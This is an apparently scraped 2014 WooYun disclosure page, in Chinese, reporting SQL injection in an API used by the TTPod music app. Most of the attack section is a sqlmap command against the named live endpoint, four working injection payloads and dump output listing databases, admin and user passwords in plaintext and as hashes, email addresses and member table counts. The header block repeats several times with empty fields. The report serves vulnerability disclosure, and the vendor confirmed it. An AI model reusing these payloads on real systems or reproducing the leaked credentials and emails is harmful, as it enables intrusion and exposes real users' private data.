天天动听APP客户端存在SQL注入漏洞可导致近60W会员信息泄露可脱裤

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-065996

漏洞标题：天天动听APP客户端存在SQL注入漏洞可导致近60W会员信息泄露可脱裤

漏洞作者：秋风

提交时间：2014-06-24 00:11

修复时间：2014-08-08 00:12

公开时间：2014-08-08 00:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-06-24：细节已通知厂商并且等待厂商处理中
2014-06-25：厂商已经确认，细节仅向厂商公开
2014-07-05：细节向核心白帽子及相关领域专家公开
2014-07-15：细节向普通白帽子公开
2014-07-25：细节向实习白帽子公开
2014-08-08：细节向公众公开

简要描述：

root权限啊。。。尼玛，我没脱，你们信麽？-。-

详细说明：

发现来源安卓客户端天天动听最新版

注入点:http://api.busdh.com/market-api/appgame/global?f=f384&v=v6.5.0.2013123016

GET参数f存在注入
通知存在注入点，未做进一步测试！

sqlmap.py -u 'http://api.busdh.com/market-api/appgame/global?f=f384&v=v6.5.0.2013123016' -p "f" --batch
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: f
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: f=f384' RLIKE (SELECT (CASE WHEN (5571=5571) THEN 0x66333834 ELSE 0x28 END)) AND 'snjQ'='snjQ&v=v6.5.0.2013123016
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)
    Payload: f=f384' AND UPDATEXML(3360,CONCAT(0x2e,0x716e6b6171,(SELECT (CASE WHEN (3360=3360) THEN 1 ELSE 0 END)),0x716e616d71),6423) AND 'tnpf'='tnpf&v=v6.5.0.2013123016
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: f=f384' UNION ALL SELECT CONCAT(0x716e6b6171,0x4e506c54656853686e61,0x716e616d71)#&v=v6.5.0.2013123016
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 OR time-based blind
    Payload: f=-8917' OR 5490=SLEEP(5) AND 'FWhc'='FWhc&v=v6.5.0.2013123016
---
back-end DBMS: MySQL 5.1
available databases [22]:                                                                                                                                                                     
[*] db_12530
[*] db_atj
[*] db_ayyc
[*] db_browsernav
[*] db_ddfg
[*] db_draw_busdh_com
[*] db_ios_skin
[*] db_market
[*] db_new_ttpod
[*] db_skin
[*] db_ttpod_discuz
[*] db_ttpod_ucenter
[*] db_update
[*] draw_busdh_com
[*] earphone
[*] entnews
[*] information_schema
[*] mysql
[*] performance_schema
[*] skin
[*] ttpod
[*] yuledb
http://draw.busdh.com/
Database: db_draw_busdh_com
Table: userinfo
[15 entries]
+-------------+--------------------+----------+---------------------+--------------+
| id          | email              | userName | createTime          | userPassword |
+-------------+--------------------+----------+---------------------+--------------+
| 00000000426 | jiege82000@163.com | admin    | 2013-10-31 14:02:11 | admin        |
| 00000000427 | hr@ttpod.com       | ttpod    | 2013-10-31 14:06:33 | ttpod*()98   |
| 00000000428 | hr@ttpod.com       | view     | 2013-10-31 15:11:39 | view         |
+-------------+--------------------+----------+---------------------+--------------+
http://fm.admin.ttpod.com/
http://admin.lrc.ttpod.com/auth/login
Database: ttpod
Table: admin
[10 entries]
+----+-------+------+----------------------------------+---------------------+
| id | name  | flag | password                         | create_time         |
+----+-------+------+----------------------------------+---------------------+
| 1  | ttpod | 0    | 5bb50d44821fffd63299af3025234087 | 2012-01-18 00:00:00 |
| 20 | baidu | 0    | dbf2074a06e4d98e7a291a38270af7b9 | 2013-01-31 08:39:39 |
+----+-------+------+----------------------------------+---------------------+
Database: db_new_ttpod
Table: users
[30 entries]
+----+----------------+---------------+----------------------------------------------------------------------------------------------+
| id | email          | username      | password                                                                                     |
+----+----------------+---------------+----------------------------------------------------------------------------------------------+
| 1  | clong@test.com | clong         | 1100                                                                                         |
| 2  | user1@test.com | user1         | $shiro1$SHA-256$500000$Cz8CvbpUrpgkk+k8puy3iA==$VRXptpQeeCwzYDTq+ZEr8rrTFFUIIan/Xk5jwHXFRYg= |
| 3  | admin@test.com | admin         | jianguo*()98                                                                                 |
| 4  | user2@test.com | user2         | $shiro1$SHA-256$500000$l48hH1mNJTZC35z6YPyj0w==$FyrwtiltMAdv7bwghfmGzqReJFliYcocbgiZkSaavMU= |
| 5  | <blank>        | tcode_manager | ttpodt1n50                                                                                   |
| 6  | <blank>        | tcode_user    | ttpod123                                                                                     |
+----+----------------+---------------+----------------------------------------------------------------------------------------------+
database management system users [10]:                                                                                                                                                        
[*] 'db_bbs'@'10.0.2.%'
[*] 'db_browsernav'@'%'
[*] 'db_skin'@'%'
[*] 'db_skin'@'10.0.2.%'
[*] 'draw_busdh_com'@'10.0.2.%'
[*] 'earphone'@'%'
[*] 'link'@'%'
[*] 'root'@'localhost'
[*] 'slave'@'%'
[*] 'webis'@'%'
database management system users password hashes:
[*] db_bbs [1]:
    password hash: *730A86BC4C3F693A6862F939E48BEBB75D786189
[*] db_browsernav [1]:
    password hash: *01D060A476642BA8335B832AC5B211F222F641B5
[*] earphone [1]:
    password hash: *01D060A476642BA8335B832AC5B211F222F641B5
[*] link [1]:
    password hash: *01D060A476642BA8335B832AC5B211F222F641B5
[*] root [1]:
    password hash: *01D060A476642BA8335B832AC5B211F222F641B5
[*] webis [1]:
    password hash: *01D060A476642BA8335B832AC5B211F222F641B5
	
Database: db_ttpod_ucenter                                                                                                                                                                    
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| uc_members          | 594367  |
| uc_memberfields     | 594365  |
| uc_newpm            | 421201  |
| uc_pms              | 4622    |
| uc_friends          | 4276    |
| uc_pm_members       | 2400    |
| uc_pm_indexes       | 2059    |
| uc_pm_lists         | 1237    |
| uc_notelist         | 516     |
| uc_pm_messages_2    | 223     |
| uc_pm_messages_3    | 221     |
| uc_pm_messages_8    | 221     |
| uc_pm_messages_7    | 216     |
| uc_pm_messages_9    | 208     |
| uc_pm_messages_5    | 200     |
| uc_pm_messages_1    | 199     |
| uc_pm_messages_0    | 198     |
| uc_pm_messages_6    | 188     |
| uc_pm_messages_4    | 185     |
| uc_settings         | 28      |
| uc_vars             | 3       |
| uc_admins           | 1       |
| uc_applications     | 1       |
| uc_failedlogins     | 1       |
| uc_protectedmembers | 1       |
+---------------------+---------+
[00:46:28] [INFO] the SQL query used returns 404 entries
Database: db_ttpod_discuz                                                                                                                                                                     
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| pre_forum_post                        | 847629  |
| cdb_posts                             | 727193  |
| pre_common_member_log                 | 501857  |
| cdb_members                           | 501856  |
| cdb_memberfields                      | 501844  |
| pre_common_member_count_archive       | 467197  |
| pre_common_member_field_forum_archive | 467197  |
| pre_common_member_profile_archive     | 467197  |
| pre_common_member_status_archive      | 467197  |
| pre_common_member_field_home_archive  | 467196  |
| pre_common_member_archive             | 467189  |
| pre_common_onlinetime                 | 294138  |
| pre_home_notification                 | 208959  |
| cdb_onlinetime                        | 204705  |
| pre_common_credit_rule_log            | 166058  |
| pre_forum_attachment                  | 165258  |
| pre_forum_thread                      | 153779  |
| cdb_attachments                       | 124347  |
| pre_common_member                     | 110564  |
| pre_common_member_status              | 110563  |
| pre_common_member_count               | 110562  |
| pre_common_member_field_forum         | 110561  |
| pre_common_member_field_home          | 110561  |
| pre_common_member_profile             | 110561  |
| pre_forum_threadaddviews              | 105521  |
| pre_common_credit_log                 | 98319   |
| cdb_threads                           | 90232   |
| pre_security_evilpost                 | 86098   |
| cdb_spacecaches                       | 85234   |
| pre_common_member_newprompt           | 72957   |
| pre_plugin_user_defender_badpwd       | 66821   |
| pre_forum_threadmod                   | 60158   |
| pre_forum_ratelog                     | 59086   |
| cdb_ratelog                           | 57426   |
| pre_forum_threadpartake               | 51160   |
| cdb_attachpaymentlog                  | 45503   |
| pre_common_district                   | 45052   |
| pre_forum_statlog                     | 37616   |
| pre_forum_pollvoter                   | 32688   |
| cdb_memberspaces                      | 30319   |
| pre_forum_filter_post                 | 23690   |
| pre_common_connect_guest              | 22800   |
| cdb_threadsmod                        | 21460   |
| pre_connect_memberbindlog             | 21201   |
| pre_common_member_connect             | 19835   |
| pre_common_admincp_cmenu              | 18913   |
| cdb_admincustom                       | 18903   |
| pre_forum_attachment_2                | 17757   |
| pre_forum_attachment_3                | 17259   |
| pre_forum_attachment_6                | 16682   |
| pre_forum_attachment_1                | 16646   |
| pre_forum_attachment_9                | 16357   |
| pre_forum_attachment_0                | 16104   |
| pre_forum_attachment_4                | 15775   |
| pre_forum_attachment_7                | 15662   |
| pre_forum_attachment_5                | 15462   |
| pre_forum_attachment_8                | 15196   |
| pre_home_friend_request               | 13045   |
| pre_forum_modwork                     | 10522   |
| pre_connect_feedlog                   | 10034   |
| pre_security_eviluser                 | 9110    |
| pre_home_favorite                     | 8838    |
| cdb_myposts                           | 8810    |
| pre_forum_attachment_exif             | 8667    |
| pre_forum_sofa                        | 8462    |
| cdb_favorites                         | 8394    |
| pre_discuz_security_banip             | 8126    |
| pre_forum_thread_censor               | 8106    |
| cdb_pms                               | 7829    |
| pre_common_word                       | 7497    |
| pre_forum_postcache                   | 7136    |
| cdb_modworks                          | 5622    |
| pre_connect_postfeedlog               | 5457    |
| cdb_mythreads                         | 4832    |
| pre_connect_tthreadlog                | 4735    |
| pre_common_remote_port                | 4272    |
| pre_common_member_crime               | 4201    |
| pre_forum_threadimage                 | 2599    |
| pre_common_magiclog                   | 2588    |
| cdb_magiclog                          | 2369    |
| pre_forum_medallog                    | 2369    |
| cdb_medallog                          | 2120    |
| pre_common_credit_rule_log_field      | 2004    |
| pre_common_member_grouppm             | 1599    |
| pre_forum_attachment_unused           | 1449    |
| pre_common_credit_log_field           | 1438    |
| cdb_paymentlog                        | 1425    |
| pre_forum_polloption                  | 1273    |
| cdb_polloptions                       | 1136    |
| pre_common_tagitem                    | 1116    |
| pre_common_member_medal               | 1095    |
| pre_forum_postcomment                 | 1091    |
| pre_forum_newthread                   | 927     |
| pre_forum_threaddisablepos            | 884     |
| pre_home_pic                          | 826     |
| pre_common_failedip                   | 825     |
| pre_home_friend                       | 762     |
| pre_common_member_action_log          | 747     |
| pre_common_stat                       | 698     |
| pre_plugin_banklog                    | 678     |
| cdb_rsscaches                         | 638     |
| pre_forum_threadclass                 | 552     |
| pre_forum_post_tableid                | 513     |
| pre_common_smiley                     | 501     |
| cdb_smilies                           | 472     |
| pre_common_setting                    | 465     |
| cdb_buddys                            | 462     |
| cdb_regips                            | 452     |
| pre_home_friendlog                    | 389     |
| cdb_stylevars                         | 360     |
| pre_discuz_security_manager_action    | 357     |
| pre_forum_warning                     | 338     |
| pre_common_session                    | 336     |
| pre_discuz_security_forum             | 327     |
| pre_common_statuser                   | 306     |
| pre_common_tag                        | 301     |
| cdb_warnings                          | 281     |
| pre_common_block_item                 | 254     |
| pre_home_comment                      | 250     |
| cdb_settings                          | 238     |
| pre_common_syscache                   | 229     |
| pre_forum_threadhot                   | 216     |
| pre_forum_poll                        | 190     |
| pre_home_pokearchive                  | 188     |
| cdb_words                             | 187     |
| pre_common_regip                      | 176     |
| cdb_polls                             | 169     |
| pre_home_feed                         | 167     |
| pre_forum_post_location               | 161     |
| pre_forum_threadcalendar              | 158     |
| pre_plugin_bankoperation              | 155     |
| cdb_banned                            | 141     |
| pre_home_poke                         | 137     |
| pre_common_stylevar                   | 135     |
| cdb_statvars                          | 130     |
| pre_common_member_magic               | 125     |
| pre_forum_rsscache                    | 115     |
| pre_common_block_pic                  | 108     |
| pre_baidusubmit_sitemap               | 106     |
| pre_plugin_user_defender_stat         | 105     |
| pre_common_block_style                | 103     |
| cdb_membermagics                      | 102     |
| pre_home_follow                       | 98      |
| pre_home_visitor                      | 94      |
| pre_forum_hotreply_member             | 93      |
| cdb_moderators                        | 90      |
| pre_common_searchindex                | 90      |
| pre_forum_hotreply_number             | 90      |
| pre_forum_moderator                   | 83      |
| pre_common_admincp_perm               | 77      |
| cdb_threadtypes                       | 73      |
| pre_common_report                     | 72      |
| pre_forum_forum                       | 69      |
| pre_forum_forumfield                  | 69      |
| cdb_medals                            | 67      |
| pre_forum_medal                       | 67      |
| pre_forum_spacecache                  | 67      |
| cdb_forumlinks                        | 65      |
| cdb_typeoptions                       | 65      |
| pre_forum_typeoption                  | 65      |
| pre_common_pluginvar                  | 61      |
| pre_common_nav                        | 59      |
| cdb_forumfields                       | 58      |
| cdb_forums                            | 58      |
| pre_common_devicetoken                | 54      |
| cdb_rewardlog                         | 52      |
| cdb_reportlog                         | 51      |
| pre_common_member_profile_setting     | 51      |
| cdb_stats                             | 50      |
| pre_pig_member                        | 50      |
| pre_common_block                      | 49      |
| pre_common_cache                      | 49      |
| cdb_caches                            | 42      |
| cdb_subscriptions                     | 41      |
| pre_forum_attachtype                  | 41      |
| pre_common_member_verify              | 39      |
| pre_common_member_secwhite            | 38      |
| pre_common_optimizer                  | 36      |
| pre_common_template_block             | 35      |
| pre_common_usergroup_field            | 35      |
| cdb_attachtypes                       | 34      |
| cdb_faqs                              | 34      |
| cdb_usergroups                        | 33      |
| pre_forum_thread_moderate             | 33      |
| pre_home_album                        | 33      |
| pre_common_credit_rule                | 32      |
| cdb_promotions                        | 31      |
| pre_common_usergroup                  | 31      |
| pre_home_blog                         | 27      |
| pre_home_blogfield                    | 27      |
| pre_common_magic                      | 25      |
| pre_common_friendlink                 | 22      |
| pre_common_plugin                     | 22      |
| cdb_threadtags                        | 21      |
| pre_common_cron                       | 20      |
| cdb_tags                              | 19      |
| pre_common_banned                     | 18      |
| pre_plugin_user_defender              | 18      |
| cdb_failedlogins                      | 17      |
| cdb_searchindex                       | 15      |
| pre_forum_poststick                   | 15      |
| pre_home_click                        | 15      |
| cdb_crons                             | 13      |
| pre_common_grouppm                    | 13      |
| pre_common_myapp                      | 13      |
| cdb_magics                            | 12      |
| cdb_projects                          | 12      |
| pre_common_failedlogin                | 12      |
| pre_forum_bbcode                      | 11      |
| pre_home_doing                        | 11      |
| pre_common_admincp_member             | 10      |
| pre_security_member                   | 10      |
| cdb_bbcodes                           | 9       |
| cdb_ranks                             | 9       |
| cdb_styles                            | 9       |
| pre_baidusubmit_setting               | 9       |
| pre_common_secquestion                | 9       |
| pre_baidusubmit_urlstat               | 8       |
| pre_forum_polloption_image            | 8       |
| pre_forum_post_moderate               | 8       |
| cdb_templates                         | 7       |
| cdb_magicmarket                       | 6       |
| cdb_request                           | 6       |
| pre_common_diy_data                   | 6       |
| pre_forum_onlinelist                  | 6       |
| pre_home_show                         | 6       |
| cdb_announcements                     | 5       |
| pre_common_admincp_group              | 5       |
| pre_common_admingroup                 | 5       |
| pre_common_advertisement              | 5       |
| pre_common_member_verify_info         | 5       |
| cdb_admingroups                       | 4       |
| cdb_creditslog                        | 4       |
| cdb_imagetypes                        | 4       |
| cdb_onlinelist                        | 4       |
| cdb_typemodels                        | 4       |
| pre_common_process                    | 4       |
| pre_discuz_security_adminlog          | 4       |
| pre_forum_access                      | 4       |
| pre_forum_imagetype                   | 4       |
| pre_forum_threadclosed                | 4       |
| pre_plugin_user_defender_failedlogin  | 4       |
| pre_common_word_type                  | 3       |
| pre_forum_grouplevel                  | 3       |
| pre_forum_replycredit                 | 3       |
| pre_home_class                        | 3       |
| cdb_access                            | 2       |
| cdb_advertisements                    | 2       |
| pre_common_admincp_session            | 2       |
| pre_common_patch                      | 2       |
| pre_common_style                      | 2       |
| pre_common_template                   | 2       |
| pre_forum_promotion                   | 2       |
| pre_mobile_setting                    | 2       |
| pre_plugin_banklist                   | 2       |
| pre_tools_rule                        | 2       |
| pre_yy_killreg                        | 2       |
| cdb_adminactions                      | 1       |
| cdb_adminsessions                     | 1       |
| cdb_itempool                          | 1       |
| cdb_pmsearchindex                     | 1       |
| cdb_profilefields                     | 1       |
| pre_common_addon                      | 1       |
| pre_common_uin_black                  | 1       |
| pre_forum_announcement                | 1       |
| pre_forum_threadprofile               | 1       |
| pre_forum_trade                       | 1       |
| pre_hdx_player_activity               | 1       |
| pre_home_picfield                     | 1       |
| pre_home_share                        | 1       |
+---------------------------------------+---------+
Database: ttpod
Table: admin
[10 entries]
+----+-------+------+----------------------------------+---------------------+
| id | name  | flag | password                         | create_time         |
+----+-------+------+----------------------------------+---------------------+
| 1  | ttpod | 0    | 5bb50d44821fffd63299af3025234087 | 2012-01-18 00:00:00 |
| 20 | baidu | 0    | dbf2074a06e4d98e7a291a38270af7b9 | 2013-01-31 08:39:39 |
+----+-------+------+----------------------------------+---------------------+
Database: db_new_ttpod
Table: users
[30 entries]
+----+----------------+---------------+----------------------------------------------------------------------------------------------+
| id | email          | username      | password                                                                                     |
+----+----------------+---------------+----------------------------------------------------------------------------------------------+
| 1  | clong@test.com | clong         | 1100                                                                                         |
| 2  | user1@test.com | user1         | $shiro1$SHA-256$500000$Cz8CvbpUrpgkk+k8puy3iA==$VRXptpQeeCwzYDTq+ZEr8rrTFFUIIan/Xk5jwHXFRYg= |
| 3  | admin@test.com | admin         | jianguo*()98                                                                                 |
| 4  | user2@test.com | user2         | $shiro1$SHA-256$500000$l48hH1mNJTZC35z6YPyj0w==$FyrwtiltMAdv7bwghfmGzqReJFliYcocbgiZkSaavMU= |
| 5  | <blank>        | tcode_manager | ttpodt1n50                                                                                   |
| 6  | <blank>        | tcode_user    | ttpod123                                                                                     |
+----+----------------+---------------+----------------------------------------------------------------------------------------------+

漏洞证明：

修复方案：

有效过滤。
上边贴出的一些隐私信息和相关密码，建议更改下！

版权声明：转载请注明来源秋风@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2014-06-25 10:01

厂商回复：

谢谢

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-065996

漏洞标题：天天动听APP客户端存在SQL注入漏洞可导致近60W会员信息泄露可脱裤

相关厂商：ttpod.com

漏洞作者：秋风

提交时间：2014-06-24 00:11

修复时间：2014-08-08 00:12

公开时间：2014-08-08 00:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源秋风@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-065996

漏洞标题：天天动听APP客户端存在SQL注入漏洞可导致近60W会员信息泄露可脱裤

相关厂商：ttpod.com

漏洞作者： 秋风

提交时间：2014-06-24 00:11

修复时间：2014-08-08 00:12

公开时间：2014-08-08 00:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-065996"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 秋风@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：秋风

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源秋风@乌云